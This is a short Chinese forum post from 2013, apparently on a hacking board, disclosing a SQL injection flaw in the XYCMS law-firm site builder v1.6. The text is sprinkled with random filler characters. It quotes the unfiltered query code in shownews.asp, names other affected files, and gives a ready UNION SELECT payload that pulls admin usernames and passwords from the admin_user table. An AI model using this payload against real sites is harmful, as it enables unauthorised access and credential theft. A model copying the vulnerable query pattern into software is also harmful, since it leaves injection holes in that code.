前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似: y' z6 ]7 T i+ J
! Q1 U1 R: P2 D2 F ]% u+ ^淫荡分割线
4 P. B( \% W, }; r--------------------------------------------------------
* X: x4 \+ s3 ?6 x( x5 w$ g% ?6 W
8 b5 v4 j0 R/ r审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
! i3 K' z3 B9 v( _8 j源码地址:http://down.chinaz.com/soft/29233.htm; q! y/ Y! i; @) l- L( }" l4 h
9 D* p1 w4 L# W h
漏洞文件:shownews.asp
7 m5 W9 Y& E5 s/ H) r4 f2 W$ z漏洞代码:7-13行
+ z$ i+ u# u. }" C1 T% {" [5 R % H( V; ]8 Y7 l: f' L
' g$ f7 E$ [1 \0 ~$ P! g<%
0 z& W6 t( G. hid=request.QueryString("id")7 \; p2 c8 M2 z6 N- a
5 R. m7 x ]5 i- a, h D0 o
set snews=server.createobject("adodb.recordset")
0 f5 i, F! [% \: v: n) m- r4 {exec="select * from [news] where id="&id: h& ]$ r" C: A" c; \8 P. `: \
snews.open exec,conn,1,1
3 \' e% f5 {6 M4 s6 R$ `1 i; B7 H/ w%>
5 _0 p" H5 R" B3 g0 d D
7 G ]5 h1 }& _' t; y
$ B7 `" ~ f- Z6 K" {% \8 a什么过滤都没有 直造成注入
- |+ H, x: \% i 3 B4 ]" o8 k3 u) v7 L9 R
注入点:http://127.0.0.1:99/shownews.asp?id=xx
, q' c6 Z4 |- q% Y
- e( Y; z% W) p5 P) |其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
5 C* ]0 H; D5 L* k! J& h
- i$ o3 q4 O* V9 w5 q " g* \6 [0 j2 Z ]/ e
exp: union select 1,admin,password,4,5,7 from admin_user9 w9 g7 o A* E# f: j6 T: X' b% X: I
B" g) ^/ H9 E/ v& o8 {- `6 s |
发表于 2013-4-4 17:28:12
收藏
支持
反对